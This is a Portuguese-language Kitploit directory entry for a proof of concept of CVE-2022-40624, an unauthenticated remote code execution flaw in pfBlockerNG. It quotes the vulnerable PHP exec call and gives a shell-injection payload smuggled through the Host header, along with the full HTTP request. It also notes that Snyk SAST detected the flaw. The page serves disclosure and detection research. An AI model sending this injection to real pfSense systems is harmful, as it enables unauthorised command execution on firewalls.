Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pfBlockerNg-CVE-2022-40624 — Exploração de prova de conceito para execução remota de código não autenticada no pfBlockerNg via entrada não sanitizada na função de consulta TLD do DNSBL, com análise de detecção SAST. | Kitploit
Ferramentas/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

Exploração de prova de conceito para execução remota de código não autenticada no pfBlockerNg via entrada não sanitizada na função de consulta TLD do DNSBL, com análise de detecção SAST.

Ver Repositório
24há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

pfBlockerNg-CVE-2022-40624

Contexto

pfBlockerNG é a próxima geração do pfBlocker com os seguintes recursos:

  1. Gerencie fontes de listas IPv4/v6 nos formatos 'Deny, Permit or Match'.
  2. Banco de dados GeoIP da MaxMind Inc. (versão gratuita GeoLite2).
  3. Melhorias de deduplicação, supressão e reputação.
  4. Recurso para baixar de diversos formatos de lista.
  5. Integração avançada para fontes de ameaças de reputação de IP da Proofpoint ET IQRisk.
  6. Bloqueio de nomes de domínio (DNSBL) por meio do resolvedor de DNS Unbound.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

Versões Afetadas

pfBlockerNg <2.1.4_27

Vulnerabilidade

Execução remota de código não autenticada (RCE)

A consulta da seção de Bloqueio de TLD do index.php inclui uma entrada do usuário não sanitizada/não escapada d_query originada do cabeçalho Host no sumidouro da função exec do PHP.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

Exploração

Requer acesso HTTP ao console web do pfSense. Exemplo de payload: ' *; sleep 5; '

Requisição de POC:

GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

Inspiração

Adoro o pfBlockerNg e fui inspirado pelo recente CVE-2022-31814 do Di r00t e pelo excelente writeup https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ e fiquei curioso para ver se a ferramenta de teste estático de segurança de aplicações (SAST) da Snyk detectaria a vulnerabilidade. Então baixei o respectivo arquivo index.php versão 2.1.4_26 e executei o Snyk Code contra ele. Com certeza, a Snyk detectou a vulnerabilidade e outra semelhante apenas algumas linhas depois.

Baixar ferramenta